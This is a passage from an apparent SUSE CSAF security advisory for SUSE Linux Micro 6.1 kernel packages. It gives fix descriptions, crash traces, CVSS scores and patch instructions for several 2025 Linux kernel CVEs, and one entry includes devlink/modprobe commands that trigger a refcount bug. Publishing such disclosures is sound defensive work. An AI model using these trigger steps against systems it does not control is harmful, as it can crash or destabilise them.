6.18.0-rc4+ #1 NONE\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x42/0xe0\nCall Trace:\n \u003cTASK\u003e\n devl_rate_leaf_destroy+0x8d/0x90\n __nsim_dev_port_del+0x6c/0x70 [netdevsim]\n nsim_dev_reload_destroy+0x11c/0x140 [netdevsim]\n nsim_drv_remove+0x2b/0xb0 [netdevsim]\n device_release_driver_internal+0x194/0x1f0\n bus_remove_device+0xc6/0x130\n device_del+0x159/0x3c0\n device_unregister+0x1a/0x60\n del_device_store+0x111/0x170 [netdevsim]\n kernfs_fop_write_iter+0x12e/0x1e0\n vfs_write+0x215/0x3d0\n ksys_write+0x5f/0xd0\n do_syscall_64+0x55/0x10f0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n[2]\ndevlink dev eswitch set pci/0000:08:00.0 mode switchdev\ndevlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000\ndevlink port function rate add pci/0000:08:00.0/group1\ndevlink port function rate set pci/0000:08:00.0/32768 parent group1\nmodprobe -r mlx5_ib mlx5_fwctl mlx5_core\n\ndmesg:\nrefcount_t: decrement hit 0; leaking memory.\nWARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0\nCPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x42/0xe0\nCall Trace:\n \u003cTASK\u003e\n devl_rate_leaf_destroy+0x8d/0x90\n mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core]\n mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core]\n mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core]\n mlx5_sf_esw_event+0xc4/0x120 [mlx5_core]\n notifier_call_chain+0x33/0xa0\n blocking_notifier_call_chain+0x3b/0x50\n mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core]\n mlx5_eswitch_disable+0x63/0x90 [mlx5_core]\n mlx5_unload+0x1d/0x170 [mlx5_core]\n mlx5_uninit_one+0xa2/0x130 [mlx5_core]\n remove_one+0x78/0xd0 [mlx5_core]\n pci_device_remove+0x39/0xa0\n device_release_driver_internal+0x194/0x1f0\n unbind_store+0x99/0xa0\n kernfs_fop_write_iter+0x12e/0x1e0\n vfs_write+0x215/0x3d0\n ksys_write+0x5f/0xd0\n do_syscall_64+0x53/0x1f0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40251",
"url": "https://www.suse.com/security/cve/CVE-2025-40251"
},
{
"category": "external",
"summary": "SUSE Bug 1254856 for CVE-2025-40251",
"url": "https://bugzilla.suse.com/1254856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40251"
},
{
"cve": "CVE-2025-40252",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40252"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end()\n\nThe loops in \u0027qede_tpa_cont()\u0027 and \u0027qede_tpa_end()\u0027, iterate\nover \u0027cqe-\u003elen_list[]\u0027 using only a zero-length terminator as\nthe stopping condition. If the terminator was missing or\nmalformed, the loop could run past the end of the fixed-size array.\n\nAdd an explicit bound check using ARRAY_SIZE() in both loops to prevent\na potential out-of-bounds access.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40252",
"url": "https://www.suse.com/security/cve/CVE-2025-40252"
},
{
"category": "external",
"summary": "SUSE Bug 1254849 for CVE-2025-40252",
"url": "https://bugzilla.suse.com/1254849"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40252"
},
{
"cve": "CVE-2025-40254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: remove never-working support for setting nsh fields\n\nThe validation of the set(nsh(...)) action is completely wrong.\nIt runs through the nsh_key_put_from_nlattr() function that is the\nsame function that validates NSH keys for the flow match and the\npush_nsh() action. However, the set(nsh(...)) has a very different\nmemory layout. Nested attributes in there are doubled in size in\ncase of the masked set(). That makes proper validation impossible.\n\nThere is also confusion in the code between the \u0027masked\u0027 flag, that\nsays that the nested attributes are doubled in size containing both\nthe value and the mask, and the \u0027is_mask\u0027 that says that the value\nwe\u0027re parsing is the mask. This is causing kernel crash on trying to\nwrite into mask part of the match with SW_FLOW_KEY_PUT() during\nvalidation, while validate_nsh() doesn\u0027t allocate any memory for it:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary)\n RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch]\n Call Trace:\n \u003cTASK\u003e\n validate_nsh+0x60/0x90 [openvswitch]\n validate_set.constprop.0+0x270/0x3c0 [openvswitch]\n __ovs_nla_copy_actions+0x477/0x860 [openvswitch]\n ovs_nla_copy_actions+0x8d/0x100 [openvswitch]\n ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch]\n genl_family_rcv_msg_doit+0xdb/0x130\n genl_family_rcv_msg+0x14b/0x220\n genl_rcv_msg+0x47/0xa0\n netlink_rcv_skb+0x53/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x280/0x3b0\n netlink_sendmsg+0x1f7/0x430\n ____sys_sendmsg+0x36b/0x3a0\n ___sys_sendmsg+0x87/0xd0\n __sys_sendmsg+0x6d/0xd0\n do_syscall_64+0x7b/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe third issue with this process is that while trying to convert\nthe non-masked set into masked one, validate_set() copies and doubles\nthe size of the OVS_KEY_ATTR_NSH as if it didn\u0027t have any nested\nattributes. It should be copying each nested attribute and doubling\nthem in size independently. And the process must be properly reversed\nduring the conversion back from masked to a non-masked variant during\nthe flow dump.\n\nIn the end, the only two outcomes of trying to use this action are\neither validation failure or a kernel crash. And if somehow someone\nmanages to install a flow with such an action, it will most definitely\nnot do what it is supposed to, since all the keys and the masks are\nmixed up.\n\nFixing all the issues is a complex task as it requires re-writing\nmost of the validation code.\n\nGiven that and the fact that this functionality never worked since\nintroduction, let\u0027s just remove it altogether. It\u0027s better to\nre-introduce it later with a proper implementation instead of trying\nto fix it in stable releases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40254",
"url": "https://www.suse.com/security/cve/CVE-2025-40254"
},
{
"category": "external",
"summary": "SUSE Bug 1254852 for CVE-2025-40254",
"url": "https://bugzilla.suse.com/1254852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40254"
},
{
"cve": "CVE-2025-40256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: also call xfrm_state_delete_tunnel at destroy time for states that were never added\n\nIn commit b441cf3f8c4b (\"xfrm: delete x-\u003etunnel as we delete x\"), I\nmissed the case where state creation fails between full\ninitialization (-\u003einit_state has been called) and being inserted on\nthe lists.\n\nIn this situation, -\u003einit_state has been called, so for IPcomp\ntunnels, the fallback tunnel has been created and added onto the\nlists, but the user state never gets added, because we fail before\nthat. The user state doesn\u0027t go through __xfrm_state_delete, so we\ndon\u0027t call xfrm_state_delete_tunnel for those states, and we end up\nleaking the FB tunnel.\n\nThere are several codepaths affected by this: the add/update paths, in\nboth net/key and xfrm, and the migrate code (xfrm_migrate,\nxfrm_state_migrate). A \"proper\" rollback of the init_state work would\nprobably be doable in the add/update code, but for migrate it gets\nmore complicated as multiple states may be involved.\n\nAt some point, the new (not-inserted) state will be destroyed, so call\nxfrm_state_delete_tunnel during xfrm_state_gc_destroy. Most states\nwill have their fallback tunnel cleaned up during __xfrm_state_delete,\nwhich solves the issue that b441cf3f8c4b (and other patches before it)\naimed at. All states (including FB tunnels) will be removed from the\nlists once xfrm_state_fini has called flush_work(\u0026xfrm_state_gc_work).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40256",
"url": "https://www.suse.com/security/cve/CVE-2025-40256"
},
{
"category": "external",
"summary": "SUSE Bug 1254851 for CVE-2025-40256",
"url": "https://bugzilla.suse.com/1254851"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40256"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n 